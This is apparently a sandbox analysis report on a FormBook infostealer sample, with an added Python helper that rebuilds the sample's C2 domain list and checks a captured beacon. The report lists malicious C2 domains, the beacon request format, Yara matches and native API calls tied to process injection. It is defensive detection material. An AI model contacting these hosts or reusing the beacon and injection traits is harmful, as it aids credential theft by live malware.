Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.download/jqc/www.kornteengoods.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.hotvidzhub.downloadReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.com/jqc/www.registeredagentfirm.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.net/jqc/www.fitdramas.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kimberlygoedhart.netReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.com/jqc/www.ludisenofloral.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.kornteengoods.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.com/jqc/www.11sxsx.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.ludisenofloral.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.com/jqc/www.sterlworldshop.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.luxusgrotte.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.com/jqc/www.quintred.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.novergi.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.com/jqc/www.kimberlygoedhart.net
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.quintred.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.registeredagentfirm.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.com/jqc/www.internetmarkaching.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.sterlworldshop.comReferer:
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.com/jqc/M
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.szyulics.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com/jqc/
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.com/jqc/www.novergi.com
Source: explorer.exe, 00000010.00000002.638723848.000000000569F000.00000004.00000001.sdmp String found in binary or memory: http://www.wlw-hnlt.comReferer:
Source: explorer.exe, 00000010.00000000.312521457.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/
Source: GRACE.exe, 00000000.00000002.293079053.0000000002841000.00000004.00000001.sdmp String found in binary or memory: https://www.google.comT
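The explorer.exe strings above are not independent URLs. As the overlapping strings show, the decoded domain list sits back to back in memory, so a string of the form http://www.A/jqc/www.B is the tail of entry A running into the start of entry B, and the fragments ending in "Referer:" or in a stray letter ("/jqc/M") are the same overrun into adjacent data. The font-vendor URLs (fontbureau.com, urwpp.de, sandoll.co.kr and similar) come from the process-start snapshot of explorer.exe (phase 00000000) and are font metadata, not indicators. The script below is an added example, not code from the report or from Joe Sandbox: it copies the relevant strings from this section, rebuilds the ordered candidate list from that overlap relation, and checks the captured GET (re-split into CRLF lines, which the report runs together) for the traits the signature flags: no User-Agent header, the per-sample path /jqc/, and a Host taken from the list. The successor rule and the request reconstruction are the assumptions.

```python
"""Rebuild the FormBook C2 candidate list from the explorer.exe memory strings
in this report and check the captured beacon against it.

Added example, not code from the report or from Joe Sandbox. Assumes that a
string "http://www.A/jqc/www.B" means B follows A in the decoded list and
that "/jqc/" is this sample's C2 path (taken from the captured GET).
"""
import re
from urllib.parse import parse_qs, urlsplit

C2_PATH = "/jqc/"
# Overlap of one list entry into the next; the stray "/jqc/M" and "Referer:" fragments do not match.
CHAIN_RE = re.compile(r"http://(www\.[\w.-]+)/jqc/(www\.[\w.-]+)")

# Strings copied from the explorer.exe phase-00000002 dump in this report, plus three
# lines that must be ignored (truncated entry, Referer fragment, font metadata).
MEMORY_STRINGS = [
    "http://www.11sxsx.com/jqc/www.luxusgrotte.com",
    "http://www.dl888.net/jqc/www.hongreng.xyz",
    "http://www.fitdramas.com/jqc/www.szyulics.com",
    "http://www.hongreng.xyz/jqc/www.hotvidzhub.download",
    "http://www.hotvidzhub.download/jqc/www.kornteengoods.com",
    "http://www.internetmarkaching.com/jqc/www.registeredagentfirm.com",
    "http://www.kimberlygoedhart.net/jqc/www.fitdramas.com",
    "http://www.kornteengoods.com/jqc/www.ludisenofloral.com",
    "http://www.ludisenofloral.com/jqc/www.11sxsx.com",
    "http://www.luxusgrotte.com/jqc/www.sterlworldshop.com",
    "http://www.novergi.com/jqc/www.quintred.com",
    "http://www.quintred.com/jqc/www.kimberlygoedhart.net",
    "http://www.registeredagentfirm.com/jqc/www.wlw-hnlt.com",
    "http://www.sterlworldshop.com/jqc/www.internetmarkaching.com",
    "http://www.wlw-hnlt.com/jqc/www.novergi.com",
    "http://www.szyulics.com/jqc/M",
    "http://www.dl888.netReferer:",
    "http://www.fontbureau.com/designers",
]

# The captured request, re-split into CRLF lines (constructed from the report's
# run-together HTTP line; the seven NUL bytes are its "Data Raw" body).
BEACON = (
    "GET /jqc/?njq0dR=RzuPnv&JfE=fDutAcwv9Lxx6pK+U/h8/Jmgh7jy3dQeKhNoyB3Bjj0bKWR6mwge2sLPOJXFU1/1riqc HTTP/1.1\r\n"
    "Host: www.dl888.net\r\n"
    "Connection: close\r\n"
    "\r\n" + "\x00" * 7
)


def successor_map(lines):
    """Map each domain to the one that follows it in the decoded list."""
    succ = {}
    for line in lines:
        m = CHAIN_RE.search(line)
        if m:
            succ[m.group(1)] = m.group(2)
    return succ


def c2_candidates(lines):
    """Walk the successor map from its head(s) to recover the ordered domain list."""
    succ = successor_map(lines)
    heads = sorted(d for d in succ if d not in succ.values())
    ordered = []
    for head in heads:
        cur = head
        while cur is not None and cur not in ordered:  # stop at the end or at a cycle
            ordered.append(cur)
            cur = succ.get(cur)
    return ordered


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def check_beacon(raw, candidates):
    """Score a request against the traits of this sample's C2 traffic."""
    method, target, headers, _body = parse_request(raw)
    parts = urlsplit(target)
    host = headers.get("host", "")
    return {
        "method": method,
        "host": host,
        "host_in_candidates": host in candidates,
        "path_matches": parts.path == C2_PATH,
        "no_user_agent": "user-agent" not in headers,
        "query_params": len(parse_qs(parts.query)),
    }


if __name__ == "__main__":
    chain = c2_candidates(MEMORY_STRINGS)
    print(len(chain), "candidate C2 domains:", " -> ".join(chain))
    print(check_beacon(BEACON, chain))
```

The walk recovers 16 domains starting at www.dl888.net, the host that was actually contacted, and ending at www.szyulics.com, whose successor is lost in the truncated "/jqc/M" string. All 16 are worth blocking or hunting for, not just the one that appeared on the wire, since the sample rotates through the list when a host fails.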

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419D60 NtCreateFile, 10_2_00419D60
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E10 NtReadFile, 10_2_00419E10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E90 NtClose, 10_2_00419E90
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419F40 NtAllocateVirtualMemory, 10_2_00419F40
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419D5D NtCreateFile, 10_2_00419D5D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E0B NtReadFile, 10_2_00419E0B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419E8A NtClose, 10_2_00419E8A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00419F3A NtAllocateVirtualMemory, 10_2_00419F3A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379910 NtAdjustPrivilegesToken,LdrInitializeThunk, 10_2_01379910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013799A0 NtCreateSection,LdrInitializeThunk, 10_2_013799A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379860 NtQuerySystemInformation,LdrInitializeThunk, 10_2_01379860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379840 NtDelayExecution,LdrInitializeThunk, 10_2_01379840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013798F0 NtReadVirtualMemory,LdrInitializeThunk, 10_2_013798F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A20 NtResumeThread,LdrInitializeThunk, 10_2_01379A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A00 NtProtectVirtualMemory,LdrInitializeThunk, 10_2_01379A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A50 NtCreateFile,LdrInitializeThunk, 10_2_01379A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379540 NtReadFile,LdrInitializeThunk, 10_2_01379540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013795D0 NtClose,LdrInitializeThunk, 10_2_013795D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379710 NtQueryInformationToken,LdrInitializeThunk, 10_2_01379710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013797A0 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_013797A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379780 NtMapViewOfSection,LdrInitializeThunk, 10_2_01379780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379660 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_01379660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013796E0 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_013796E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379950 NtQueueApcThread, 10_2_01379950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013799D0 NtCreateProcessEx, 10_2_013799D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379820 NtEnumerateKey, 10_2_01379820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137B040 NtSuspendThread, 10_2_0137B040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013798A0 NtWriteVirtualMemory, 10_2_013798A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379B00 NtSetValueKey, 10_2_01379B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A3B0 NtGetContextThread, 10_2_0137A3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A10 NtQuerySection, 10_2_01379A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379A80 NtOpenDirectoryObject, 10_2_01379A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137AD30 NtSetContextThread, 10_2_0137AD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379520 NtWaitForSingleObject, 10_2_01379520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379560 NtWriteFile, 10_2_01379560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013795F0 NtQueryInformationFile, 10_2_013795F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379730 NtQueryVirtualMemory, 10_2_01379730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A710 NtOpenProcessToken, 10_2_0137A710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0137A770 NtOpenThread, 10_2_0137A770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379770 NtSetInformationFile, 10_2_01379770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379760 NtOpenProcess, 10_2_01379760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379FE0 NtCreateMutant, 10_2_01379FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379610 NtEnumerateValueKey, 10_2_01379610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379670 NtQueryInformationProcess, 10_2_01379670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01379650 NtQueryValueKey, 10_2_01379650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013796D0 NtCreateKey, 10_2_013796D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A50 NtCreateFile,LdrInitializeThunk, 17_2_03739A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739910 NtAdjustPrivilegesToken,LdrInitializeThunk, 17_2_03739910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037399A0 NtCreateSection,LdrInitializeThunk, 17_2_037399A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739860 NtQuerySystemInformation,LdrInitializeThunk, 17_2_03739860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739840 NtDelayExecution,LdrInitializeThunk, 17_2_03739840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739710 NtQueryInformationToken,LdrInitializeThunk, 17_2_03739710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739FE0 NtCreateMutant,LdrInitializeThunk, 17_2_03739FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739780 NtMapViewOfSection,LdrInitializeThunk, 17_2_03739780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037396E0 NtFreeVirtualMemory,LdrInitializeThunk, 17_2_037396E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037396D0 NtCreateKey,LdrInitializeThunk, 17_2_037396D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739540 NtReadFile,LdrInitializeThunk, 17_2_03739540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037395D0 NtClose,LdrInitializeThunk, 17_2_037395D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739B00 NtSetValueKey, 17_2_03739B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A3B0 NtGetContextThread, 17_2_0373A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A20 NtResumeThread, 17_2_03739A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A10 NtQuerySection, 17_2_03739A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A00 NtProtectVirtualMemory, 17_2_03739A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739A80 NtOpenDirectoryObject, 17_2_03739A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739950 NtQueueApcThread, 17_2_03739950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037399D0 NtCreateProcessEx, 17_2_037399D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373B040 NtSuspendThread, 17_2_0373B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739820 NtEnumerateKey, 17_2_03739820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037398F0 NtReadVirtualMemory, 17_2_037398F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037398A0 NtWriteVirtualMemory, 17_2_037398A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A770 NtOpenThread, 17_2_0373A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739770 NtSetInformationFile, 17_2_03739770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739760 NtOpenProcess, 17_2_03739760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739730 NtQueryVirtualMemory, 17_2_03739730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373A710 NtOpenProcessToken, 17_2_0373A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037397A0 NtUnmapViewOfSection, 17_2_037397A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739670 NtQueryInformationProcess, 17_2_03739670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739660 NtAllocateVirtualMemory, 17_2_03739660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739650 NtQueryValueKey, 17_2_03739650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739610 NtEnumerateValueKey, 17_2_03739610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739560 NtWriteFile, 17_2_03739560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0373AD30 NtSetContextThread, 17_2_0373AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_03739520 NtWaitForSingleObject, 17_2_03739520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_037395F0 NtQueryInformationFile, 17_2_037395F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19D60 NtCreateFile, 17_2_00D19D60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E90 NtClose, 17_2_00D19E90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E10 NtReadFile, 17_2_00D19E10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19D5D NtCreateFile, 17_2_00D19D5D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E8A NtClose, 17_2_00D19E8A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D19E0B NtReadFile, 17_2_00D19E0B
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_02633FAC CreateProcessAsUserW, 0_2_02633FAC
Detected potential crypto function
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: String function: 0133B150 appears 133 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 036FB150 appears 54 times
Sample file is different than original file name gathered from version info
Source: GRACE.exe, 00000000.00000002.292894435.0000000002600000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameRunPe6.dll" vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296613818.00000000059D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSHCore1.dll0 vs GRACE.exe
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs GRACE.exe
